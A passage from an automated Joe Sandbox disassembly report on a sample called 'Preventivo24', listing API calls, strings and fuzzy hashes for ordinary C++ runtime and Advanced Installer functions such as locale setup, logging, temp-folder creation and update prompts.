Part of subcall function 00BE8427: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00BE843F

std::locale::_Setgloballocale.LIBCPMT ref: 00BE82F1

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: 4a1443e91495b1a7596d369e27d89e0f9422824133d097b940aa600cc93739a0
Instruction ID: 055a32df25268fe6c52fad63a1ba96bc84b870647db763db078f11711be161b4
Opcode Fuzzy Hash: 4a1443e91495b1a7596d369e27d89e0f9422824133d097b940aa600cc93739a0
Instruction Fuzzy Hash: 9E01BC71600AA18BCB05EB21D845A7D7BF1FF94300B144088F80A5B382DF74AE42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 009F0FE0 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009F0FF0

Part of subcall function 00BE80CC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,009F1006,?,00000000,00000000), ref: 00BE80D8
Part of subcall function 00BE80CC: GetExitCodeThread.KERNEL32(?,00000000,?,?,?,009F1006,?,00000000,00000000), ref: 00BE80F1
Part of subcall function 00BE80CC: CloseHandle.KERNEL32(?,?,?,?,009F1006,?,00000000,00000000), ref: 00BE8103

std::_Throw_Cpp_error.LIBCPMT ref: 009F1019
std::_Throw_Cpp_error.LIBCPMT ref: 009F1020
std::_Throw_Cpp_error.LIBCPMT ref: 009F1027

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$Thread$CloseCodeCurrentExitHandleObjectSingleWait
String ID:
API String ID: 2210105531-0
Opcode ID: 1ed3cb3a0ecf168414361c9adb4cb5cf89df12003af28a51cee2dff6013e6b98
Instruction ID: 1077266fc8a195bce1c4cb2fd207ab443665ff0fa3d126562878bfe1ae6ce97e
Opcode Fuzzy Hash: 1ed3cb3a0ecf168414361c9adb4cb5cf89df12003af28a51cee2dff6013e6b98
Instruction Fuzzy Hash: C3F0E230400B489ED7342EA48C0676272D8DB00701F0485ADA7AC578D3EFB5A84497D2

Uniqueness

Uniqueness Score: -1.00%

Function 00B180F0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B182D6

Strings

iostream, xrefs: 00B184B0
ios_base::failbit set, xrefs: 00B183B2

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ___std_exception_copy
String ID: ios_base::failbit set$iostream
API String ID: 2659868963-302468714
Opcode ID: 24a93fc7c7078e5c839f7250e0e885976e89dfa77a45dbe07946041cafce4062
Instruction ID: 962b97866b568342b1c42c96275d2871f2ce93a58284d658f9a60619ea1c7489
Opcode Fuzzy Hash: 24a93fc7c7078e5c839f7250e0e885976e89dfa77a45dbe07946041cafce4062
Instruction Fuzzy Hash: 2CC16DB1D00258DFDB14DFA8C8847AEFBF4FF49314F24825AE825AB281DB745945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F66F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 268windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 009F6772
SendMessageW.USER32(00000008,00000000,00000000,00000000), ref: 009F6861

Part of subcall function 009F8520: SysFreeString.OLEAUT32(00000000), ref: 009F85E0

Strings

AtlAxWin140, xrefs: 009F676A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CreateFreeMessageSendStringWindow
String ID: AtlAxWin140
API String ID: 4045344427-3842940177
Opcode ID: 9a199d20367ca7197ff518c720d8b3b96007b6e7d4af3210c51bdeb990371ff5
Instruction ID: 03afed295f9023d7b58dbbd6890a4452cf2feeac215fc3def32748fe35dbc325
Opcode Fuzzy Hash: 9a199d20367ca7197ff518c720d8b3b96007b6e7d4af3210c51bdeb990371ff5
Instruction Fuzzy Hash: 8CA13675A002199FCB04DF68CC84B6EBBB9FF49714F148199E916AB3A1CB71AD41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B57490 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 250COMMON

Download Yara Rule

Strings

Everyone, xrefs: 00B575A9
ADVINST_LOGS, xrefs: 00B57579

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressAllocateFolderHeapLibraryLoadLocationProcSpecial
String ID: ADVINST_LOGS$Everyone
API String ID: 1617241543-3921853867
Opcode ID: 30cdacdffa87a747372198ea654186bfd8d12e21def640c817cb21b8c07d2967
Instruction ID: 90bce2ca7b428e11cc83febc1f784149bc1dbddba8f624f1082b8bc2911e4596
Opcode Fuzzy Hash: 30cdacdffa87a747372198ea654186bfd8d12e21def640c817cb21b8c07d2967
Instruction Fuzzy Hash: 88A1E271A05609CFDB00DF68E959BAEB7F1EF58324F244288E811AB391DB356E05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B5FA80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00B5FBB3

Strings

User accepted to install a newer version., xrefs: 00B5FC48, 00B5FC6F, 00B5FC70
User refused to install a newer version., xrefs: 00B5FC51

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ActiveWindow
String ID: User accepted to install a newer version.$User refused to install a newer version.
API String ID: 2558294473-4113633398
Opcode ID: 4dc0ecfa3388d7fb28cfc9ca3a2cfa5d96a8a03f73833566fef3e6413cd75bca
Instruction ID: e30192dff915affe0bb98d16df496472fb2fe0aa4ce2ee4fa4c2225604b9bcd8
Opcode Fuzzy Hash: 4dc0ecfa3388d7fb28cfc9ca3a2cfa5d96a8a03f73833566fef3e6413cd75bca
Instruction Fuzzy Hash: 9081D231A006499FCB05DB68C85476EF7F5EF48314F1881ADE819A7392DB35AD06CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B56150 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C5A26F,000000FF), ref: 00B5630B
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C5A26F,000000FF), ref: 00B563C4

Strings

<< Advanced Installer (x86) Log >>, xrefs: 00B56263

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CloseCriticalDeleteHandleHeapProcessSection
String ID: << Advanced Installer (x86) Log >>
API String ID: 1977327082-396061572
Opcode ID: 9961671ea6f001a0970d75cd00fbae45d9f174d0cab3f86528ab4285624fcd9e
Instruction ID: 8a08414468b6257e0558a18a28370118c9a2a3bb125ba294c8233d179bd005d5
Opcode Fuzzy Hash: 9961671ea6f001a0970d75cd00fbae45d9f174d0cab3f86528ab4285624fcd9e
Instruction Fuzzy Hash: B271BC71A04349CBCB05DF68C86476EBBF5EB88314F24429DE814AB392DB759E06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B48E10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,26FBC52C,00000000,?,?,?,00B3877E,00000000), ref: 00B48F68

Strings

\\?\, xrefs: 00B48F75
Extraction path set to:, xrefs: 00B48FCD

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Path
String ID: Extraction path set to:$\\?\
API String ID: 2875597873-2975605734
Opcode ID: ab20e711dcd3ba72a130a46906a6df2aa55905cf0f7a844d889758873c7fe65a
Instruction ID: bb697ef53b7ca541d5f0939f8a534ea8fda00ec361c7c9d59c581274ad8fe695
Opcode Fuzzy Hash: ab20e711dcd3ba72a130a46906a6df2aa55905cf0f7a844d889758873c7fe65a
Instruction Fuzzy Hash: 25610435A0061ADFCB15DF68C884BAEB7B1FF48320F154259E925A7391DB31AE06CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B0E210 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,26FBC52C), ref: 00B0E2B2

Strings

\\?\, xrefs: 00B0E3AF, 00B0E3DA
\\?\UNC\, xrefs: 00B0E2D9, 00B0E33A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Path
String ID: \\?\$\\?\UNC\
API String ID: 2875597873-3019864461
Opcode ID: b45879d7efce7f4fc330568ce63412bb87467b17a27f2b513556744b473bee62
Instruction ID: 49d0927bee361e79c37f60825e94d752aedfc6bec3c308bb18f915c740c828c1
Opcode Fuzzy Hash: b45879d7efce7f4fc330568ce63412bb87467b17a27f2b513556744b473bee62
Instruction Fuzzy Hash: 155192B0D002449BDB14DF68D845BAEFBF4FF59308F108A59E86167281DB71A984CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00B88E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

OpenEventW.KERNEL32(00000000,00000000,26FBC52C,_pbl_evt,00000008,?,?,00CBB278,00000001,26FBC52C,?), ref: 00B88EBE
CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00B88EDB

Strings

_pbl_evt, xrefs: 00B88E92

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Event$CreateOpen
String ID: _pbl_evt
API String ID: 2335040897-4023232351
Opcode ID: 0edfd09514f8c41425567c42dd5ea1af088af849c245f5eb9031bdead78fbb07
Instruction ID: 60d0207979520a37f1fa87b03571a51c4aaf24abffcc5d7c70cd95cfd9be0be9
Opcode Fuzzy Hash: 0edfd09514f8c41425567c42dd5ea1af088af849c245f5eb9031bdead78fbb07
Instruction Fuzzy Hash: EB519E71D00248EFDB10DFA8C985BAEB7B8FB04710F508669E815A7690EB746E04CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00B577B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,80000002,26FBC52C,?,80000002,00D30080), ref: 00B577EF
CreateDirectoryW.KERNEL32(80000002,00000000,?,80000002,00D30080), ref: 00B57850

Strings

ADVINST_LOGS, xrefs: 00B57828

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CreateDirectoryPathTemp
String ID: ADVINST_LOGS
API String ID: 2885754953-2492584244
Opcode ID: 9e1b5b943b0908c017d301e8b14b91f16dc8b08c5a6c404aafce9dd4e5610972
Instruction ID: 120d1e68bf2b299031377349f904ec61e71286b940741f65940b1f9e0018457f
Opcode Fuzzy Hash: 9e1b5b943b0908c017d301e8b14b91f16dc8b08c5a6c404aafce9dd4e5610972
Instruction Fuzzy Hash: E251D075A842199BCB209F28D8487BAB3F4FF10315F2446EEEC5997290EB355E85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B56F80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

WriteFile.KERNEL32(?,00000005,?,?,00000000,00CA56A4,00000002,?,00000000,CPU: ,00000005), ref: 00B57071
FlushFileBuffers.KERNEL32(?), ref: 00B5707A

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

Strings

CPU: , xrefs: 00B56FD8, 00B56FEA, 00B56FF4

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$BuffersFindFlushHeapProcessResourceWrite
String ID: CPU:
API String ID: 2793600070-1724696780
Opcode ID: ffe4657acf20b0376f16fce868b75c035553b62100a2ddfee044024798ce0c70
Instruction ID: ef00fdd022022fd07aadd6be1bf2b2ff44746217f14ca6e1af5aada1e70fda75
Opcode Fuzzy Hash: ffe4657acf20b0376f16fce868b75c035553b62100a2ddfee044024798ce0c70
Instruction Fuzzy Hash: AE419131A00619ABC711DBA8DC49BAEBBB5FF44320F544269F915A73D0DB34AD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D0C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A2D0EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A2D14E

Strings

bad locale name, xrefs: 00A2D171

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 90517b2404d4f85ccdeee15b56e99ce70d7c73c8054fc79b83e3c938d28f536e
Instruction ID: 2d9b5ddf398bb84f00ab955800aed73a6bbdf1465bd068caf9c48cbc02c0c089
Opcode Fuzzy Hash: 90517b2404d4f85ccdeee15b56e99ce70d7c73c8054fc79b83e3c938d28f536e
Instruction Fuzzy Hash: 4421F170A05784DFD720CF68C904B4ABFE4AF15714F1486ADE485C7B81D7B9EA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D750 Relevance: 5.3, APIs: 4, Instructions: 300memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000), ref: 00A2D8C5
HeapFree.KERNEL32(00000000,?,00000000), ref: 00A2D8CB
GetProcessHeap.KERNEL32(?,00000000), ref: 00A2D95C
HeapFree.KERNEL32(00000000,?,00000000), ref: 00A2D962

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
